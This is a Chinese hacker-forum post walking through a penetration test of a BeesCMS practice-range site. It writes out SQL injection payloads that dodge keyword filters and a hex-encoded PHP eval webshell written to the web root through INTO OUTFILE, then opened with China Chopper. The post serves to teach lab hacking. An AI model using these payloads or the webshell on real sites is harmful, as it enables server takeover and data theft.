跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

对一个BeesCMS网站的渗透测试

精选回复

发布于

前言

自己刚开始接触渗透测试,于是想找一些综合型的靶场来练练手,自己搭建没有那种感觉,于是找到了一个叫墨者学院的网站,上面的靶场还是很多的,而且大多数贴合实战,我喜欢!
今天,我们来玩一个BeesCMS网站。

文章如有抄袭或不足,请指出,我会继续改进的。

话不多说,直接开始

在这里插入图片描述
普普通通的一个网站,刚开始没什么思路,御剑先扫描一波:
在这里插入图片描述
发现了疑似后台的URLadmin/login.php,访问一下后台:
在这里插入图片描述
有验证码,看起来好像不能爆破,这里windows7火狐浏览器访问正常,而Kali Firefox访问却是:
在这里插入图片描述
不过不影响我们BP抓包:
在这里插入图片描述
这里先搁置一下。

尝试首页文章SQL注入

看首页文章,有?id,尝试注入。
在这里插入图片描述
SQLmap注入无果:
在这里插入图片描述
尝试绕过依旧无果:
在这里插入图片描述
说到注入,此时的我想到后台,于是我开始尝试在后台测试SQL注入。

后台SQL注入

在win7里面在此尝试注入,在用户名后面写上单引号,发现抱错:
在这里插入图片描述
终于找到了转机!继续尝试SQL注入。
尝试1Payloadadmin' union select 1,2,3,4,5#:
在这里插入图片描述
发现union,select被过滤,心里有点慌,尝试双写绕过admin' ununionion selselectect 1,2,3,4,5#
在这里插入图片描述
再次尝试更改payload:admin' un union ion seleselectct 1,2,3,4,5#:
在这里插入图片描述
尝试往里面写木马,根据题目的提示得出payloadadmin' uni union on selselectect 1,2,3,4,0x3c3f70687020406576616c28245f504f53545b636d645d293b3f3e in into outoutfilefile '/var/www/html/shell.php'#注意这里的木马需要用HEX加密,不然无法写入(木马连接口令CMD):
在这里插入图片描述
shell文件写进去了,然后我们用菜刀连接一下:
在这里插入图片描述
木马连接成功,在根目录下发现key.txt,同时发现是LINUX服务器,打开后即可发现我们要获取的key文件。
至此,网站已经被沦陷,黑客攻击成功。

后记

此次渗透的要点:

  • 御剑后台扫描
  • SQL注入写入木马
  • 常见的关键字过滤Bypass
  • 菜刀连接木马技术

坑很多,大家可以把BeesCMS搭建在自己的本地虚拟服务器上面复现,愿每一次渗透都能找到更优秀的自己,文章如有不足之处,请私信我。

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。